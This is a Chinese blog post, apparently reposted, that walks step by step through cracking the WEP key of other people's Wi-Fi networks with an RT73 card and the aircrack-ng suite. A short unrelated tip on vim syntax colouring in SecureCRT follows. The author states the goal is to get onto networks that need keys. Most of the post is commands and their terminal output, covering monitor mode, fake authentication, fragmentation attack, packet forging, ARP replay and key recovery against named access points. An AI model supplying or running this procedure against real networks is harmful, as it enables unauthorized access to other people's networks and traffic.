您的位置:首页 > 其它

RT73网卡破解WIFI密码(WEP)&& secureCRT中VI编辑器显示彩色文本

2010-04-15 11:35 489 查看
出于兴趣需要,想连接下多个地方的无线WIFI网络,结果都需要密钥。所以就花了几天时间照网上的方法破解下试试,终于被俺试出来了,过程如下:

1,我的网卡型号是RT73 USB Wireless LAN Card,以上名称是在设备管理器中显示的完整名字,我在XP下装了完整的原厂驱动,但在ubuntu里面是什么驱动都没有装。

2,首先需要了解当前环境下目标WIFI网的名字,频道号。我是用USB引导进入BT3这个工具,进入桌面后,点击里面的WIFI assistant工具,就可以显示当前的网络名字和频道号。记下即可。比如:我记下了当前网络名是:Micorlink_SZ,频道号是11。

3,进入ubuntu,插入无线网卡,保证网卡是正常加载并识别的,正常的话会有一个提示框,显示加载ralink RT73无线网卡。

4,新建立一个终端运行:ifconfig -a

终端显示:

wlan0 Link encap:以太网 硬件地址 00:0c:43:2a:36:c4

BROADCAST MULTICAST MTU:1500 跃点数:1

接收数据包:0 错误:0 丢弃:0 过载:0 帧数:0

发送数据包:0 错误:0 丢弃:0 过载:0 载波:0

碰撞:0 发送队列长度:1000

接收字节:0 (0.0 B) 发送字节:0 (0.0 B)

参数说明:显示完整的PC网络配置。

功能:通过此命令可以得到自己的无线网卡的名字和MAC地址,备用。

5,终端运行:airmon-ng start wlan0 11

终端显示:

Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy1] (monitor mode enabled on mon0)

参数说明:wlan0是自己的无线网卡加载名字,11是目标网开放的频道号。

功能:第一次执行此命令,会提示安装ai的XX软件,用apt-get install安装它要求的软件即可。此命令是将自己的无线网卡置于monitor 模式,有抓包的功能。运行该命令成功后,会看到无线网卡升级成监控模式后的别名,就是mon0。如果发现弄错了频道可以多试几次。

6,终端运行:airodump-ng --ivs -w name -c 11 mon0

终端显示:

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1D:73:DE:9C:F5 -55 71 16605 14114 12 11 54 . WEP WEP OPN Microlink_SZ

00:1D:0F:84:06:8C -53 0 31 0 0 6 54 . WEP WEP TP-LINK

00:1D:73:DE:A8:1D -63 99 17107 62334 11 11 54 . WEP WEP OPN Microlink_SZ



BSSID STATION PWR Rate Lost Packets Probes

(not associated) 00:11:F6:88:14:D6 -69 0 - 1 0 61

(not associated) 00:1F:3A:97:B1:CE -71 0 - 1 0 92

00:1D:73:DE:9C:F5 00:1F:3B:16:00:CB -69 1 -12 8 5215 Microlink_SZ

00:1D:73:DE:9C:F5 00:1F:3B:A0:C2:1B -69 54 - 6 18 4707 WXYZ,Microlink_SZ

参数说明:BSSID是AP的MAC地址;PWR是AP信号的强度大小,一般低于10就丢包比较严重,难破解;RXQ是干扰的大小;Beacons是发送接收的包,在跳说明有数据;#Data是接收到的可以用来破解的特殊包,如果一直不变说明没有客户端连接,比较难破解;CH是频道号;MB是网络连接速度,54就是54MB;ENC、CIPHER、AUTH是加密方式,显示WEP的才可以破解;ESSID 是AP的名字,为了阻挡别人破解可以才用中文的名字。

功能:列出无线WIFI网的信息。这个窗口开着就好了,不用管它。

7,新建一个终端,运行:aireplay-ng -1 0 -e Microlink_SZ -a 001d73dea81d -h 000c432a36c4 mon0

终端显示:

10:44:54 Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11

10:44:54 Sending Authentication Request (Open System) [ACK]

10:44:54 Authentication successful

10:44:54 Sending Association Request [ACK]

10:44:54 Association successful :-) (AID: 1)

参数说明:Microlink_SZ是AP的名字;001d73dea81d是目标要破解网卡的MAC地址,由第六步可以得到,注意去掉中间的冒号;000c432a36c4是自己网卡的MAC地址,由第四步可以得到,也要去掉冒号;mon0是由第五步得到的监控名字。

功能:这个命令主要是针对#Data增长缓慢的AP,aireplay顾名思义就是重发模拟发包的意思,是一条欺骗命令,连接上AP。如果执行成功,那么会显示 successful :-) 。

8,终端运行:aireplay-ng -5 -b 001d73dea81d -h 000c432a36c4 mon0

终端显示:

10:54:18 Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11

10:54:18 Waiting for a data packet...

Read 27 packets...

Size: 88, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:1D:73:DE:A8:1D

Dest. MAC = 00:1E:BE:C7:B8:CA

Source MAC = 00:1F:3A:52:BD:73

0x0000: 0841 2c00 001d 73de a81d 001f 3a52 bd73 .A,...s.....:R.s

0x0010: 001e bec7 b8ca f021 2d42 0000 31f4 7340 .......!-B..1.s@

0x0020: b50a bd80 41fc 1d01 5103 5ec1 21fa 4a5e ....A...Q.^.!.J^

0x0030: f423 aced ff21 8623 664c 815b f58c f6e7 .#...!.#fL.[....

0x0040: 8b8c 2b31 4319 2a9e f99c e895 af6a bb13 ..+1C.*......j..

0x0050: dd55 d2d7 0eda 68da .U....h.

Use this packet ? y

Saving chosen packet in replay_src-0415-105425.cap

10:55:12 Data packet found!

10:55:12 Sending fragmented packet

10:55:12 Got RELAYED packet!!

10:55:12 Trying to get 384 bytes of a keystream

10:55:12 Got RELAYED packet!!

10:55:12 Trying to get 1500 bytes of a keystream

10:55:13 Got RELAYED packet!!

Saving keystream in fragment-0415-105512.xor

Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

参数说明:001d73dea81d 是目标破解的AP的MAC地址;000c432a36c4 是自己网卡的MAC地址;mon0是监控别名。

功能:上一条成功后,开始收集#Data的数据,才能够进行模拟破解。如果#Data没有增加,该命令会一直执行,直到捕获一个#Data包。之后,程序会问你是否用这个包来模拟攻击,回答Y即可。如果攻击成功,则会显示。成功之后会显示一个文件名:fragment-xxxx-xxxx.xor文件,这个文件马上就会用到,该文件是保存在root目录下(我自己的电脑)。

9,终端运行:packetforge-ng -0 -a 001d73dea81d -h 000c432a36c4 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0415-105512.xor -w mrarp

终端显示:

Wrote packet to: mrarp

参数说明:001d73dea81d 是待破解的MAC地址;000c432a36c4 是自己的MAC地址;fragment-0415-105512.xor就是第八步显示的文件名;

功能:破解包的准备过程,显示生成文件到mrarp。

10,终端运行:aireplay-ng -2 -r mrarp -x 512 mon0

终端显示:

No source MAC (-h) specified. Using the device MAC (00:0C:43:2A:36:C4)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:1D:73:DE:A8:1D

Dest. MAC = FF:FF:FF:FF:FF:FF

Source MAC = 00:0C:43:2A:36:C4

0x0000: 0841 0201 001d 73de a81d 000c 432a 36c4 .A....s.....C*6.

0x0010: ffff ffff ffff 8001 e4cb 8500 0039 fd12 .............9..

0x0020: 169e 7a6a b98d 8bd7 08d9 6bb3 fed2 5890 ..zj......k...X.

0x0030: d1bc d1ef 2bfe 0ec7 b11d 3032 246e 40c9 ....+.....02$n@.

0x0040: a65a 27af .Z'.

Use this packet ? y

Saving chosen packet in replay_src-0415-110249.cap

sending package xxxx.

参数说明:mon0是自己的无线网卡监听设备别名;512 是攻击速度,1024是最大值,一般512即可。

功能:这一步开始后,选择Y会看到sending 的package 数量在增加,同时第一个终端里面显示的#Data也在快速增加,只需等待即可。

11,新建终端运行:aircrack-ng -n 64 -b 001d73dea81d name-01.ivs

终端显示:

Opening name-01.ivs

Attack will be restarted every 5000 captured ivs.

Starting PTW attack with 40103 ivs.

Aircrack-ng 1.0 rc3

[00:00:11] Tested 8 keys (got 40982 IVs)

KB depth byte(vote)

0 0/ 1 36(58156) 8A(48492) B5(48016) 86(47920) 19(47676)

1 0/ 1 39(52472) 83(47580) B2(46496) D0(46448) 29(46312)

2 0/ 1 39(53488) 22(48804) FC(48144) 85(48108) 55(47784)

3 0/ 1 39(54596) A7(48580) 46(48568) 76(48392) 22(47804)

4 0/ 7 04(48432) BD(47996) 04(47680) B9(47524) 17(47376)

KEY FOUND! [ 36:39:39:39:39 ] (ASCII: 69999 )

Decrypted correctly: 100%

参数说明:001d73dea81d 是要破解的目标MAC地址;name-01.ivs是之前生成的一个文件,在root目录下以name-xx.ivs命名,寻找最大编号的那个。

功能:只要#Data达到10000以上,一会儿就会显示破解出来的密码,同时会显示对应的ASCII码。如果运气不好,多等待一下即可。

================================================================================================

secureCRT中,首先设置选型-》会话选项-》终端-》仿真,仿真模式选择ANSI,并勾选ANSI颜色复选框。

接着编辑文件/etc/vim/vimrc,把syntax on前的注释去掉,但发现这样做还不行。如下已经是修改过的,还是没有显示彩色



再升级VI编辑器,用apt-get install vim之后,再编辑VIM就好了。







参考文章:http://www.city009.cn/wep-wap-pojie-8.html

参考原文:http://blog.csdn.net/rooklyn21/article/details/14230119
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: